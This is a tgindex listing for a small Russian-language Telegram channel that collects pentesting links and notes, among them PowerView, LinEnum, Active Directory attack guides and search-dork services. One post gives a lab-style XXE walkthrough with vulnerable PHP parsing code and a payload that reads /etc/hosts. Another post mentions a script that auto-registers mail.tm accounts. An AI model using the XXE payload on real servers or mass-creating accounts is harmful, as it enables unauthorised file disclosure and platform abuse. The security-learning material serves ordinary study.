tgindex
Последний пост
1 апр.
Последнее чтение
12 авг.
Постов за неделю
0
Всего постов
21
Тип
открытый
Язык
und
В каталоге с
12 авг.
Подписчики
276
0 за 3 дн.
Сутки
0
0,00%
Неделя
 
Месяц
 
Просмотров на пост
597
21 постов
Вовлечённость
216,3%
к подписчикам
Постов в день
0,0
всего 21
Упоминаний
2
каналов
Охват размещения
оценка
1/24сутки в ленте
1/48двое суток
1/72трое суток

Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.

Посты

  • Разведка внутри системы используя PShell https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

  • https://github.com/The-Viper-One/PsMapExec

  • 16 мар.27814из S_E_Book

    • Нашел очень объемную и актуальную подборку полезных ресурсов на тему управления уязвимостями. Все ресурсы аккуратно отсортированы по разделам, включая всевозможные агрегаторы трендовых и обсуждаемых уязвимостей, базы данных, реестры и бюллетени. Добавляйте в закладки: ➡️ https://start.me/p/n74opD/cve-vm-by-alexredsec #CVE

  • 28 янв.3466из haccking

    LinEnum #Linux #pentest #полезное Сбор всей информации о системе для выявления потенциальных векторов повышения привилегий в Linux. Все проверки собраны в одни Bash скрипт не требующий дополнительных зависимостей. Ссылка на GitHub LH | News | OSINT | AI

  • 28 янв.2706из in51d3

    Перебирайте, молодежь

  • nslookup myip.opendns.com. resolver1.opendns.com

  • видео или голосовое, без подписи

  • 20 февр. 2025 г.1 26628из S_E_Book

    👨‍💻 Пентест Active Directory. • С момента создания службы каталогов Active Directory (AD) прошло уже 25 лет. За это время служба обросла функционалом, протоколами и различными клиентами. • Материал, который Вы найдете по ссылкам ниже, станет хорошей отправной точкой для изучения особенностей и слабых мест AD. Содержание следующее: - Trees and Forests / Components; - Enumerating AD with Bloodhound; - Authentication, Authorization, Access Control and more; - Enumeration; - LLMNR Poisoning; - Lateral movement & privilege escalation; - Domain persistence and cross forest attacks. • Вот ещё очень хороший цикл статей "Active Directory in Red Teaming" — включает в себя описание различных инструментов, основ и нюансов при проведении тестирования на проникновение в AD: - Introduction; - Offensive PowerShell; - Local Privilege Escalation; - Lateral Movement; - Domain Persistence; - Domain Privilege Escalation; - Forest Trust Abuse. • Дополнительно: - DetectionLab — проект, который позволит тебе развернуть виртуальную лабораторию на базе Windows, для использования в исследовательских целях. - Vulnerable-AD — заведомо уязвимая Active Directory. Окажется полезной для практических занятий и тестов. - Cheat Sheet AD — эта шпаргалка описывает определенные методы, которые используются для атак Windows Active Directory. #Пентест #AD

  • XEE Код страницы содержит код уязвимый к атакам. libxml_disable_entity_loader(false) позволяет загружать внешние объекты. simplexml_load_string с LIBXML_NOENT позволяет веб-приложению получать доступ к внутренним файлам системы. <?php .. ... libxml_disable_entity_loader(false); $wishlist = simplexml_load_string($xml_data, "SimpleXMLElement", LIBXML_NOENT); ... .. echo "Item added to your wishlist successfully."; ?> Внешний объект ссылается на данные из внешнего файла или ресурса. В следующем коде сущность &ext; может ссылаться на внешний файл, расположенный по адресу " http://eval.com/robots.txt", который будет загружен в XML: <!DOCTYPE people [ <!ENTITY ext SYSTEM "http://tryhackme.com/robots.txt"> ]> Изначальный XML-запрос: <wishlist> <user_id>1</user_id> <item> <product_id>1</product_id> </item> </wishlist> Запрос с добавлением полезной нагрузки: <!--?xml version="1.0" ?--> <!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]> <wishlist> <user_id>1</user_id> <item> <product_id>&payload;</product_id> </item> </wishlist>

  • Автоматизация Dorks запросов через внешние сервисы 1. Dorks Tool: "https://dorks.faisalahmed.me" 2. Bug Bounty SE: "https://nitinyadav00.github.io/Bug-Bounty-Search-Engine" 3. Google Dorks BBT: "https://taksec.github.io/google-dorks-bug-bounty" - DuckDuckGo 1. Операторы: "https://duckduckgo.com/duckduckgo-help-pages/results/syntax/" - Yandex 1. Операторы: "https://hackware.ru/?p=6045" - GitHub Dorks 1. Скрипт: "https://github.com/techgaun/github-dorks" 2. Операнды: "https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets" - Shoodan Dorks 1. Операнды: "https://github.com/lothos612/shodan"

  • 29 окт. 2024 г.71118из S_E_Book

    👩‍💻 ++ 101 Linux commands. • Объемная книга (CheatSheet) для изучения командной строки Linux. Материал пригодиться не только начинающим, но и опытным пользователям Linux. Содержание следующее: • Basics; - File Hierarchy Standard (FHS); - Commands; • Disk and File System Management; - General Disk Manipulation (non-LVM); - Globs (Wildcards); - Regex; - Stream redirection; • Text Readers & Editors; - Less; - VI; • User and Group Management; • File System Permissions; • SSH; • Cronjobs; • Package Management; - RPM; - YUM; • List of commands by category: - Directory Navigation; - File Commands; - File and Directory Manipulation; - Package archive and compression tools; - System commands; - Networking Commands; - Package Management; - User Information commands; - Session commands; - Getting Help; - Applications. #Linux

  • создайте папку с текстовим доком accounts.txt И поместите файл main.py туда же и запускайте Готовые акки будут в txt файле Запуск python main.py

  • 16 окт. 2024 г.6195из webghost_channel

    Авторег почт mail.tm

  • sysctl net.ipv4.ip_default_ttl

  • sudo sysctl -w net.ipv4.ip_default_ttl=NEW_TTL_VALUE

  • https://www.youtube.com/watch?v=mF8Q1FhnU70&list=PLidcsTyj9JXJrgTzRYdwnUhUThb9bL9py

  • https://www.youtube.com/watch?v=-t1UAvTxB94&list=PLidcsTyj9JXLI9mAR4MPiL19hq5lpaYNd

  • https://codeby.net/threads/sovremennye-web-ujazvimosti-2-host-header-injection.77349/

  • 79 tools (C#) for working in Active Directory. File contents: Github link & description. #pentest #activedirectory

  • https://suno.com/

Sleepless Book — tgindex